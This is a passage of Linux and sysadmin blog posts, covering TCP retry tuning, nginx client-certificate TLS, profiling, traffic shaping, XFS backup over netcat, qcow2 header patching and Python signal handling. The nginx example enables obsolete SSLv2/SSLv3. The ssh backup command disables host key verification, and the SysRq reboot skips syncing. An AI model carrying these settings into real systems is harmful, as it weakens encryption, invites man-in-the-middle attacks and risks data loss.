08:07:12.887861 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:09:12.889364 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:11:12.890812 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:13:12.892282 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
08:15:12.893702 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840
<--- ok, now reno gives up, connection is closed after ~15 mins
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
15 minutes without the ability to connect to a VM is too long for a client. Configure the kernel again: decrease /proc/sys/net/ipv4/tcp_retries2 (net.ipv4.tcp_retries2) from 15 to 5 tries.
09:05:45.286580 IP 10.10.17.216.1312 > 10.10.17.11.5901: P 84:94(10) ack 3649 win 63679
09:05:45.320669 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:15.281030 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.281213 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.961866 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:26.661261 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:28.061265 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:30.861301 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:36.461346 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:47.661424 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
~60-90 secs
As a result one can reestablish connection to VNC in 1-2 mins.
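The retransmission timestamps in both dumps follow a simple pattern: the gap doubles every time and, in the long dump, stops growing at 2 minutes. A simplified Python model of this backoff is below. It is my own approximation and not the kernel's exact algorithm; the 120 second cap is an assumption that matches the 2 minute gaps seen above.

```python
def retransmit_intervals(initial_rto, retries, rto_max=120.0):
    """Gaps in seconds before each retransmission: doubling, capped at rto_max."""
    return [min(initial_rto * 2 ** k, rto_max) for k in range(retries)]
```

With an initial gap of 0.69 s (07:58:16.93 to 07:58:17.62) and 15 retries the gaps add up to about 1016 s, which is the distance between the first and the last transmission in the long dump. With 0.7 s and 5 retries the sum is 21.7 s, matching 09:06:25.96 to 09:06:47.66; after the last retransmission the kernel still waits for one more timeout before it gives up.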

Note, one can also kill a stale connection with the help of netfilter by setting the conntrack timeout net.netfilter.nf_conntrack_tcp_timeout_established to 1-2 hours (default is 5 days). After this time elapses iptables will send RST in both directions. But one still needs to set a proper net.ipv4.tcp_retries2.

Nginx, two-way ssl authentication

See Mutual authentication or two-way authentication.
  1. Client has X509 cert and private key.
  2. Server has its own cert and key and client cert.
  3. At connection establishing time server checks client cert and client checks server cert. Server also knows client name after auth.
On server side compile nginx (nginx-1.1.11) --with-http_ssl_module. For server we'll create cert and key
openssl genpkey -algorithm RSA -out cert.key
openssl req -new -x509 -key cert.key -out cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:localhost
Email Address []:
Note, Common Name must be equal to domain name.
Nginx config excerpt
server {
    listen       443;
    server_name  localhost;

    ssl                 on;
    ssl_certificate     cert.pem;
    ssl_certificate_key cert.key;

    ssl_session_timeout  5m;

    ssl_protocols  SSLv2 SSLv3 TLSv1;
    ssl_ciphers  HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers   on;

    location / {
        root   html;
        index  index.html index.htm;
    }
}
Test
curl -k -i https://localhost/
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 11:56:28 GMT
Content-Type: text/html
Content-Length: 151
Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT
Connection: keep-alive
Accept-Ranges: bytes

<html>
<head>
<title>Welcome to nginx!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to nginx!</h1></center>
</body>
</html>
The -k parameter must be specified because server cert is self-signed, see curl(1).
-k/--insecure
(SSL) This option explicitly allows curl to perform "insecure" SSL connections and transfers. All SSL connections are attempted to be made secure by using the CA certificate bundle installed by default. This makes all connections considered "insecure" fail unless -k/--insecure is used.
This was one-way ssl. Add the following lines to the config to require a client cert
server {
    ...
    ssl_verify_client on;
    ssl_client_certificate client.pem;
    ...
}
Test
curl -k -i https://localhost/
HTTP/1.1 400 Bad Request
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 12:09:38 GMT
Content-Type: text/html
Content-Length: 253
Connection: close

<html>
<head><title>400 No required SSL certificate was sent</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<center>No required SSL certificate was sent</center>
<hr><center>nginx/1.1.11</center>
</body>
</html>


curl -k -i --cert cert.pem --key cert.key https://localhost/
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Fri, 16 Dec 2011 12:01:56 GMT
Content-Type: text/html
Content-Length: 151
Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT
Connection: keep-alive
Accept-Ranges: bytes

<html>
<head>
<title>Welcome to nginx!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to nginx!</h1></center>
</body>
</html>
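The same check can be done from code instead of curl. Below is a Python sketch of a client that optionally presents a certificate. The function names are mine; leaving cafile unset disables server verification, which is the equivalent of curl -k and only acceptable for a test against a self-signed cert. Keep in mind that a recent Python or OpenSSL may refuse the old protocol versions listed in the config above.

```python
import http.client
import ssl


def make_client_context(certfile=None, keyfile=None, cafile=None):
    """Build a TLS client context, optionally with a client certificate."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    if cafile is None:
        # Like curl -k: do not verify the (self-signed) server certificate.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    else:
        ctx.load_verify_locations(cafile=cafile)
    if certfile is not None:
        # This is the certificate the server checks with ssl_verify_client on.
        ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)
    return ctx


def fetch_status(host, ctx, port=443):
    """Return the HTTP status of GET / over the given TLS context."""
    conn = http.client.HTTPSConnection(host, port, context=ctx)
    try:
        conn.request("GET", "/")
        return conn.getresponse().status
    finally:
        conn.close()
```

For example, fetch_status("localhost", make_client_context("cert.pem", "cert.key")) should correspond to the second curl call above, and the same call without a cert to the first one.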
User agents (google-chrome, firefox, others) often use the PKCS#12 format (files with .p12 extension). One can convert the cert.pem/cert.key pair into PKCS#12 via openssl
openssl pkcs12 -export -in cert.pem -inkey cert.key -out cert.p12
Then import cert.p12 into the browser and go to https://localhost/. Note: use certificate chains with one certificate as the root for all client certs; nginx will authenticate clients against this certificate.

Monday, December 23, 2013

Debug and profile erlang linked in driver

OTP tools like fprof refuse to profile your .so (for a good reason). So how to do this?
Like any other executable, erl loads a linked-in driver as a shared library, and one can introspect this shared library like any other. During compilation one needs to add debug info to the .so file (-ggdb flag for gcc), then attach to the running Erlang virtual machine from gdb, kdbg or similar.
> ps ax | grep erlang
 9801 pts/1    Sl+    0:00 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp -K true -- -root /usr/lib64/erlang -progname erl -- -home /home/adolgarev --
11208 pts/0    S+     0:00 grep erlang
> kdbg -p 9801 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp
Now breakpoints can be added and program state inspected.
To profile, do the following
valgrind --tool=callgrind --trace-children=yes /usr/bin/erl
Run tests, grab callgrind.out.PID, open it in kcachegrind.
In this particular example you can see that cons (|) for list creation is really slow (procedure ei_x_encode_list_header). Knowing the list size beforehand decreases the caller's relative execution time from 34.45% to 23.25%.
Note that profiling is not a sign of premature optimization; it is also a sanity check that you are not doing anything insane.

How to limit network bandwidth and introduce latency

So you want to test clients of some service like nfs in case network or service is slow. In order to do this you need to limit network throughput, introduce latency and jitter (latency variation). Ok, I bet you know how to do this
tc qdisc add dev eth0 root handle 1: prio
tc qdisc add dev eth0 parent 1:3 handle 30: tbf rate 1mbit buffer 10kb limit 3000
tc qdisc add dev eth0 parent 30:1 handle 31: netem delay 100ms 10ms distribution normal
tc filter add dev eth0 protocol ip parent 1:0 prio 3 u32 match ip dst 192.168.44.4/32 flowid 1:3
See Linux Advanced Routing & Traffic Control HOWTO.
Simple test. On server side
iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
------------------------------------------------------------
[  4] local 192.168.44.4 port 5001 connected with 192.168.44.26 port 37494
[ ID] Interval       Transfer     Bandwidth
[  4]  0.0-14.6 sec  1.52 MBytes    870 Kbits/sec
On client side
iperf -c 192.168.44.4
------------------------------------------------------------
Client connecting to 192.168.44.4, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.44.26 port 37494 connected with 192.168.44.4 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-11.8 sec  1.52 MBytes  1.08 Mbits/sec
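The numbers iperf prints are easy to verify, which is a good way to check that the shaper really limits us to about 1 Mbit/s. A tiny Python sketch, assuming iperf counts MBytes in units of 2^20 bytes and Mbits in units of 10^6 bits (the function name is mine):

```python
def mbits_per_sec(mbytes, seconds):
    """Convert a transfer of `mbytes` MBytes in `seconds` into Mbits/sec."""
    return mbytes * 2 ** 20 * 8 / seconds / 1e6
```

The client side gives mbits_per_sec(1.52, 11.8), about 1.08, and the server side mbits_per_sec(1.52, 14.6), about 0.87. Both are close to the configured rate of 1mbit; the server measures over a longer interval because of the added delay.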
Cleanup
tc qdisc del dev eth0 root

How to backup sparse file over network

Rsync will drive CPU or IO crazy. One needs to use fs specific utils to perform this kind of task. For instance, for XFS one can use xfsdump and xfsrestore via ssh tunnel
/usr/bin/ssh -o 'UserKnownHostsFile /dev/null' -o 'StrictHostKeyChecking no' -o 'ExitOnForwardFailure yes' -L1234:localhost:1234 test@192.168.14.189 'netcat -l -v -p 1234 | /sbin/xfsrestore - /home/bckp'
Restore Status: SUCCESS

/sbin/xfsdump -s /a/b/c -F - /home | netcat localhost 1234
Dump Status: SUCCESS
Things to note.
  1. ssh options 'UserKnownHostsFile /dev/null' and 'StrictHostKeyChecking no' omit known_hosts check, see ssh_config(5).
  2. ssh option 'ExitOnForwardFailure yes' forces ssh to exit with error if it failed to forward ports.
  3. be careful with netcat: there are two variants with different command-line interfaces.
  4. see xfsdump(8) and xfsrestore(8).

How to change path to backing file in qcow2

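The standard utilities cannot do this. Take C and the qcow2 image format doc and write something like
#include <arpa/inet.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* 64-bit big-endian to host conversion (assumes a little-endian host) */
#define ntohll(x) (((uint64_t)ntohl((uint32_t)((x) & 0xffffffffULL)) << 32) | ntohl((uint32_t)((x) >> 32)))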


/* change filename in qcow2 */
int backing_file_patch(const char *in_file, const char *new_backing_file) {
    
    int f;
    uint64_t backing_file_offset;
    uint32_t backing_file_size;
        
    if ((f = open(in_file, O_RDWR)) == -1) {
        perror("open");
        return 1;   /* nothing to close yet */
    }
    
    if (lseek(f, 8, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }

    if (read(f, &backing_file_offset, sizeof(backing_file_offset)) != (ssize_t)sizeof(backing_file_offset)) {
        perror("read");
        goto error;
    }
    backing_file_offset = ntohll(backing_file_offset);
    
    backing_file_size = strlen(new_backing_file);
    backing_file_size = htonl(backing_file_size);
    
    /* update backing_file_size */
    if (write(f, &backing_file_size, sizeof(backing_file_size)) == -1) {
        perror("write");
        goto error;
    }
    
    /* update path */
    if (lseek(f, backing_file_offset, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }
    if (write(f, new_backing_file, strlen(new_backing_file)) == -1) {
        perror("write");
        goto error;
    }
        
    close(f);
    return 0;
    
error:
    close(f);
    return 1;
}
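To check the result without attaching the image, one can read the header back. Here is a small Python sketch that relies on the same layout as the C code above (backing_file_offset at byte 8, backing_file_size right after it, both big-endian); read_backing_file is my own helper, not part of any qemu tool.

```python
import struct

QCOW_MAGIC = b"QFI\xfb"


def read_backing_file(path):
    """Return the backing file name stored in a qcow2 header, or None."""
    with open(path, "rb") as f:
        # magic (4 bytes), version (4), backing_file_offset (8), backing_file_size (4)
        magic, _version, offset, size = struct.unpack(">4sIQI", f.read(20))
        if magic != QCOW_MAGIC:
            raise ValueError("not a qcow2 image")
        if offset == 0:
            return None                    # image has no backing file
        f.seek(offset)
        return f.read(size).decode()
```

Calling it before and after backing_file_patch() shows the old and the new path.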
To test this
/usr/sbin/xm block-attach 0 tap:qcow2:/home/test/vm_drive_C_snapshot.qcow2 /dev/xvda w 0
/bin/ntfs-3g -o dev_offset=7340032,rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/xvda exposed
Cleanup
/bin/umount exposed
/usr/sbin/xm block-detach 0 51712

Sunday, December 22, 2013

Don't parse output from system utilities

One can often see that some system utility returns the information one needs, and then does the wrong thing: parses the output of this utility. We'll do the opposite. For instance, we'll get the broadcast address
/sbin/ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0A:CD:14:CD:77  
          inet addr:192.168.44.177  Bcast:192.168.44.255  Mask:255.255.255.0
          inet6 addr: fe80::20a:cdff:fe14:cd77/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:791580 errors:0 dropped:0 overruns:0 frame:0
          TX packets:381581 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:468681235 (446.9 Mb)  TX bytes:47469801 (45.2 Mb)
          Interrupt:18 Base address:0xc000
What does ifconfig do to get this info?
strace /sbin/ifconfig eth1
...
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
...
ioctl(4, SIOCGIFBRDADDR, {ifr_name="eth1", ifr_broadaddr={AF_INET, inet_addr("192.168.44.255")}}) = 0
...
strace shows that descriptor 4 (the socket created above) is passed to ioctl. In Python one can do the same
# get the constant beforehand
grep -R SIOCGIFBRDADDR /usr/include/*                         
/usr/include/bits/ioctls.h:#define SIOCGIFBRDADDR  0x8919  /* get broadcast PA address */


import fcntl, socket, struct
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_IP)
SIOCGIFBRDADDR = 0x8919
iface = struct.pack('256s', b'eth1')
info = fcntl.ioctl(s.fileno(), SIOCGIFBRDADDR, iface)
socket.inet_ntoa(info[20:24])
'192.168.44.255'
Why do we take bytes 20 to 24? One passes struct ifreq to ioctl (see netdevice(7)): IFNAMSIZ is 16, plus offsetof(struct sockaddr_in, sin_addr), which is 4, gives 20, and the IPv4 address itself occupies 4 bytes.
struct ifreq {
    char ifr_name[IFNAMSIZ]; /* Interface name */
    union {
        struct sockaddr ifr_addr;
        struct sockaddr ifr_dstaddr;
        struct sockaddr ifr_broadaddr;
        struct sockaddr ifr_netmask;
        struct sockaddr ifr_hwaddr;
        short           ifr_flags;
        int             ifr_ifindex;
        int             ifr_metric;
        int             ifr_mtu;
        struct ifmap    ifr_map;
        char            ifr_slave[IFNAMSIZ];
        char            ifr_newname[IFNAMSIZ];
        char *          ifr_data;
    };
};
struct sockaddr_in {
    short            sin_family;
    unsigned short   sin_port;
    struct in_addr   sin_addr;
    char             sin_zero[8];
};
struct in_addr {
    unsigned long s_addr;
};
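Note that there are no holes in these structs. With s_addr declared as unsigned long, as in the listing above, one would expect a 4-byte hole before sin_addr on 64-bit systems, but there is none: the real headers declare the fields so that no padding is needed (s_addr is a 32-bit in_addr_t). A simple test shows the difference: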
#include <stdio.h>
#include <stddef.h>

#include <netinet/in.h>


struct in_addr2 {
    unsigned long s_addr;
};
struct sockaddr_in2 {
    short            sin_family;
    unsigned short   sin_port;
    struct in_addr2  sin_addr;
    char             sin_zero[8];
};

int main(void) {
    /* offsetof yields a size_t, so print it with %zu */
    printf("%zu\n", offsetof(struct sockaddr_in, sin_addr));
    printf("%zu\n", offsetof(struct sockaddr_in2, sin_addr));
    return 0;
}

gcc 1.c
./a.out
4
8
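The offset arithmetic can also be checked from Python without touching a real interface. The sketch below is only an illustration: fake_ifreq and extract_addr are made-up helper names, and the buffer is built by hand (assuming the Linux layout described above) instead of coming from ioctl.

```python
import socket
import struct

IFNAMSIZ = 16  # size of ifr_name in struct ifreq

# struct sockaddr_in on Linux: sin_family (2 bytes), sin_port (2 bytes),
# sin_addr (4 bytes), sin_zero (8 bytes); 16 bytes, no padding.
SOCKADDR_IN = struct.Struct('=HH4s8s')


def fake_ifreq(name, addr):
    """Hand-build the first 32 bytes of a struct ifreq (no ioctl involved)."""
    sockaddr = SOCKADDR_IN.pack(socket.AF_INET, 0,
                                socket.inet_aton(addr), b'\0' * 8)
    return struct.pack('%ds' % IFNAMSIZ, name.encode()) + sockaddr


def extract_addr(ifreq):
    """Skip ifr_name, sin_family and sin_port, then take the 4 address bytes."""
    start = IFNAMSIZ + 4
    return socket.inet_ntoa(ifreq[start:start + 4])


buf = fake_ifreq('eth1', '192.168.44.255')
print(extract_addr(buf))  # prints 192.168.44.255
```

The slice start (IFNAMSIZ + 4) is the same 20 as in the ioctl example above.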
strace tells you a lot about how utilities work. One more example:
strace ps
...
open("/proc", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 5
fcntl(5, F_GETFD)                       = 0x1 (flags FD_CLOEXEC)
getdents64(5, /* 211 entries */, 32768) = 5552
stat("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/1/stat", O_RDONLY)          = 6
read(6, "1 (init) S 0 1 1 0 -1 4202752 31"..., 1023) = 187
close(6)                                = 0
open("/proc/1/status", O_RDONLY)        = 6
read(6, "Name:\tinit\nState:\tS (sleeping)\nT"..., 1023) = 675
close(6)
stat("/proc/2", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
... 
So the advice is: do not parse the output of utilities. It is unreliable and subject to change. Use ioctl, sysctl, /proc, etc. to gather the info you need, and use strace and similar tools to find out where a utility gets it.
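As a sketch of what "use /proc" can look like, here is a minimal Python reader for the same files ps opens in the trace above. The helper names list_pids and read_stat are mine, it assumes a Linux /proc, and it extracts only the first few fields described in proc(5).

```python
import os


def list_pids(proc='/proc'):
    """Numeric directory names under /proc are process ids."""
    return sorted(int(name) for name in os.listdir(proc) if name.isdigit())


def read_stat(pid, proc='/proc'):
    """Parse the leading fields of /proc/<pid>/stat (see proc(5))."""
    with open(os.path.join(proc, str(pid), 'stat')) as f:
        data = f.read()
    # The command name is wrapped in parentheses and may itself contain
    # spaces or ')', so split around the first '(' and the last ')'.
    lpar = data.index('(')
    rpar = data.rindex(')')
    rest = data[rpar + 1:].split()
    return {
        'pid': int(data[:lpar]),
        'comm': data[lpar + 1:rpar],
        'state': rest[0],
        'ppid': int(rest[1]),
    }


me = read_stat(os.getpid())
print(me['pid'], me['comm'], me['state'], me['ppid'])
```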

P.S. The funniest bug I've seen was when someone mixed stdout and stderr and got a different result on every parse, because the two streams interleave unpredictably. Another one was caused by an i18n feature.

Linux, reboot --force

If you cannot reboot your system (e.g. you cannot umount a device because it malfunctions, or the network was lost while working with a remote hard drive), use the Magic SysRq key
The magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low level commands regardless of the system's state.
The kernel must have been compiled with CONFIG_MAGIC_SYSRQ
cat /boot/config-`uname -r` | grep CONFIG_MAGIC_SYSRQ
CONFIG_MAGIC_SYSRQ=y
To actually reboot (immediately, without syncing or unmounting anything)
echo 1 > /proc/sys/kernel/sysrq
echo b > /proc/sysrq-trigger

Best template lib for C

You may have seen or heard of Clearsilver, CTPP, libctemplate. But the best template library in the spirit of C is libtemplate
Using templates in PHP and C++ has spoiled me. So when I started developing applications in C, I went hunting for a templating library that I could use again. I didn't find it, so after developing in a mixture of C for my lowlevel routines and C++ for my interface, I finally broke down and wrote a templating engine in C. (See Free HTML Template Engine.)
An example
#include <stdio.h>   /* sprintf, printf */
#include "template.h"

int
main(void) {
    struct tpl_engine *engine;
    int n;
    char n1[10], n2[10], n3[10];
    engine = tpl_engine_new();

    /* Load the template file */
    tpl_file_load(engine, "test.tpl");

    for(n = 1; n <= 10; n++) {
        sprintf(n1, "%d", n);
        sprintf(n2, "%d", n*n);
        sprintf(n3, "%d", n*n*n);
        tpl_element_set(engine, "n", n1);
        tpl_element_set(engine, "n2", n2);
        tpl_element_set(engine, "n3", n3);

        /* Parse the template 'row' and add the result to element 'rows' */
        tpl_parse(engine, "row", "rows", 1);
    }

    tpl_parse(engine, "grid", "main", 0);
    printf("%s", tpl_element_get(engine, "main"));

    return 0;
}
test.tpl
<template name="grid">
<table>
<tr>
<th>n</th>
<th>nˆ2</th>
<th>nˆ3</th>
</tr>
{rows}
</table>
</template>
<template name="row">
<tr>
<td>{n}</td>
<td>{n2}</td>
<td>{n3}</td>
</tr>
</template> 

Don't optimize when you are not asked to

The code below as you may guess multiplies two matrices (see Ulrich Drepper, What Every Programmer Should Know About Memory)
for (i = 0;  i < N; ++i)
    for (j = 0; j < N; ++j)
        for (k = 0; k < N; ++k)
            res[i][j] += mul1[i][k] * mul2[k][j];
The next piece of code does the same (as you probably would not guess anymore)
#define SM (CLS / sizeof (double))

for (i = 0; i < N; i += SM)
    for (j = 0; j < N; j += SM)
        for (k = 0; k < N; k += SM)
            for (i2 = 0, rres = &res[i][j],
                rmul1 = &mul1[i][k]; i2 < SM;
                ++i2, rres += N, rmul1 += N)
                for (k2 = 0, rmul2 = &mul2[k][j];
                    k2 < SM; ++k2, rmul2 += N)
                    for (j2 = 0; j2 < SM; ++j2)
                        rres[j2] += rmul1[k2] * rmul2[j2];
where CLS is the line size of the L1d cache
gcc -DCLS=$(getconf LEVEL1_DCACHE_LINESIZE) ...
The speed
            Original          Tuned
Cycles      16,765,297,870    2,895,041,480
Relative    100%              17.3%

But the main difference, as the author says, is
This looks quite scary.
This smacks of premature optimisation and the possibility the user really does not know what they are talking about, not to mention the problem of portability.
See Why not cache lines.
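If the tiled loop nest looks too scary to trust, it is easy to check against the naive one. Below is a sketch in plain Python (so it says nothing about speed): matmul_naive and matmul_tiled are my names, sm plays the role of SM, and unlike the C version it uses min() so that N does not have to be a multiple of the tile size.

```python
def matmul_naive(a, b):
    """Textbook triple loop, as in the first C snippet."""
    n = len(a)
    res = [[0] * n for _ in range(n)]
    for i in range(n):
        for j in range(n):
            for k in range(n):
                res[i][j] += a[i][k] * b[k][j]
    return res


def matmul_tiled(a, b, sm):
    """Same product, computed one sm x sm tile at a time."""
    n = len(a)
    res = [[0] * n for _ in range(n)]
    for i in range(0, n, sm):
        for j in range(0, n, sm):
            for k in range(0, n, sm):
                # Inner loops walk a single tile: i2, then k2, then j2,
                # the same order as in the tuned C code.
                for i2 in range(i, min(i + sm, n)):
                    for k2 in range(k, min(k + sm, n)):
                        for j2 in range(j, min(j + sm, n)):
                            res[i2][j2] += a[i2][k2] * b[k2][j2]
    return res


n = 6
a = [[i + j for j in range(n)] for i in range(n)]
b = [[i * j + 1 for j in range(n)] for i in range(n)]
print(matmul_tiled(a, b, 4) == matmul_naive(a, b))  # prints True
```

Integer matrices are used on purpose: the two versions add the terms in a different order, which with floating point could differ in the last bits.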

Fundamentals, C arrays and pointers

Why are C arrays not pointers? Well, by definition
In C, there is a strong relationship between pointers and arrays, strong enough that pointers and arrays should be discussed simultaneously. (K&R)
They are easy to mix up
When an array name is passed to a function, what is passed is the location of the initial element. (K&R)
An example
#include <stdio.h>

void func(char subarray[100], char* pointer) {
    /* An array parameter is really a pointer, so this prints the pointer size. */
    printf("sizeof subarray=%zu\n", sizeof(subarray));
    printf("address of subarray=%p\n", (void *)subarray);
    printf("pointer=%p\n", (void *)pointer);
}

int main(void) {
    char array[100];
    printf("sizeof of array=%zu\n", sizeof(array));
    printf("address of array=%p\n", (void *)array);
    printf("address of array[0]=%p\n", (void *)&array[0]);
    func(array, array);
    return 0;
}

// ----------------------------------------

sizeof of array=100
address of array=0xbfbfe760
address of array[0]=0xbfbfe760
sizeof subarray=4
address of subarray=0xbfbfe760
pointer=0xbfbfe760 

Python, profiling

'Have you seen python web developers who do high load site development for living?'
'Oh, almost all of them do such things,' you say.
'Have you seen python devs who know how to debug?'
'A few,' you say.
'Have you seen python devs who profile things that are supposed to be high loaded?'

Python has cProfile, C has kcachegrind, they look good together.

For instance, let's profile a multithreaded wsgi app. Change your handler
def read(self, request, *args, **kwargs):
    ...
    return ...
To something like
def read(self, *args, **kwargs):
    import cProfile
    import uuid
    cProfile.runctx('self.read2(*args, **kwargs)', globals(), locals(),
        '/folder_with_stats/' + uuid.uuid4().hex)
    return self.__res

def read2(self, *args, **kwargs):
    self.__res = self.read3(*args, **kwargs)

def read3(self, request, *args, **kwargs):
    ...
    return ...
Then put your app under (high) load and gather the results from folder_with_stats
import os
import pstats
import time
from pyprof2calltree import convert

# Collect stats
p = None
for i in os.listdir('/folder_with_stats'):
    filename = '/folder_with_stats/' + i
    if not p:
        p = pstats.Stats(filename)
    else:
        p.add(filename)
    os.unlink(filename)
res = str(int(time.time())) + '.kgrind'
convert(p, res)

# the first argument after the file name becomes argv[0]
os.execlp('kcachegrind', 'kcachegrind', res)
The main thing to note here is pyprof2calltree, which converts the collected stats into the calltree format that kcachegrind reads.
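The merging step can be tried on its own, without a web app or kcachegrind. The sketch below uses only the standard library; work, profile_call, merge and total_calls are illustrative names, and work stands in for a request handler.

```python
import cProfile
import os
import pstats
import tempfile


def work(n):
    """Stand-in for a request handler."""
    return sum(i * i for i in range(n))


def profile_call(folder, func, *args):
    """Run func under cProfile and dump the stats into a new file in folder."""
    fd, path = tempfile.mkstemp(dir=folder, suffix='.prof')
    os.close(fd)
    prof = cProfile.Profile()
    result = prof.runcall(func, *args)
    prof.dump_stats(path)
    return result


def merge(folder):
    """Combine every dump in folder into a single pstats.Stats object."""
    files = sorted(os.path.join(folder, name) for name in os.listdir(folder))
    stats = pstats.Stats(files[0])
    for path in files[1:]:
        stats.add(path)
    return stats


def total_calls(stats, funcname):
    """Sum the call counts of every profiled function with this name."""
    return sum(nc for (_, _, name), (cc, nc, tt, ct, callers)
               in stats.stats.items() if name == funcname)


folder = tempfile.mkdtemp()
for n in (10, 100, 1000):
    profile_call(folder, work, n)
merged = merge(folder)
print(total_calls(merged, 'work'))  # prints 3
```

Writing one dump per call, as the handler above does with uuid, keeps threads from fighting over a single stats file; the price is the merge step.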

If you want httperf with libev on board

ab eats CPU, and so does httperf. Use weighttp
weighttp -n 1000000 -c 100 -t 10 -k http://localhost/

Reminder, download big files via ssh

When downloading (or uploading) a big enough file over ssh, scp is not the best solution, because it cannot resume an interrupted transfer.
Solution
rsync --inplace -P -e "ssh -i key.pem" IN OUT
Note the --inplace parameter.

Signals and threads in python

The task: start a set of processes and wait until they terminate; if SIGTERM is received, send the same signal to all child processes and again wait until they terminate. (OK, I would rather send the signal to the process group, but anyway.)
The naive solution: use the subprocess and threading modules, start a thread per child process that calls communicate(), and join() them all in the main thread. Why naive? Because it doesn't work: the signal handler is not invoked. The documentation for the signal module says:
Although Python signal handlers are called asynchronously as far as the Python user is concerned, they can only occur between the "atomic" instructions of the Python interpreter. This means that signals arriving during long calculations implemented purely in C (such as regular expression matches on large bodies of text) may be delayed for an arbitrary amount of time.
That is, the signal handler runs only after the current "atomic" operation finishes. Unfortunately join() is one such atomic operation. In other words, the signal handler will be invoked only after the thread terminates.
Another way is to use coroutines and select:
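import fcntl
import os
import select
import subprocess


def run(cmd, preexec_fn=None):
    # Generator (the name is arbitrary): yields the child's output as it
    # arrives and '' when there is nothing to read yet, so the supervisor
    # regains control regularly. Python 2 semantics: a non-blocking read
    # raises IOError when no data is available and returns '' on EOF.
    proc = subprocess.Popen(cmd,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT,
                            close_fds=True,
                            preexec_fn=preexec_fn)

    fdesc = proc.stdout.fileno()
    flags = fcntl.fcntl(fdesc, fcntl.F_GETFL)
    fcntl.fcntl(fdesc, fcntl.F_SETFL, flags | os.O_NONBLOCK)

    while True:
        try:
            dt = proc.stdout.read()
            if dt == '':
                break
            yield dt
        except IOError:
            # EWOULDBLOCK
            yield ''

            try:
                select.select([proc.stdout], [], [], 1)
            except select.error:
                # select.error: (4, 'Interrupted system call') - ignore it,
                # just call select again
                pass

    while True:
        try:
            proc.wait()
            break
        except OSError:
            # OSError: [Errno 4] Interrupted system call
            continue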
And the supervisor (left is a list of generators created from such coroutines)
while left:
    new_left = []
    
    for execute in left:
        try:
            next(execute)
            new_left.append(execute)
        except StopIteration:
            pass
        except Exception as e:
            # remember the last error, the failed generator is dropped
            err = e

    left = new_left
Also note that EINTR in general is not handled by the python standard library; it is just forwarded up the stack, as in C. In most cases, if you are lucky, it is enough to call the interrupted routine again as in C (but C guarantees that this works, python doesn't).
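The supervisor's round-robin behaviour is easy to see without real processes. In this sketch (Python 3) chunks and failing are made-up stand-ins for the coroutines above, and supervise is the same loop with the output and errors collected for inspection.

```python
def chunks(name, count):
    """Stand-in for a coroutine that yields a child's output piece by piece."""
    for i in range(count):
        yield '%s:%d' % (name, i)


def failing(name):
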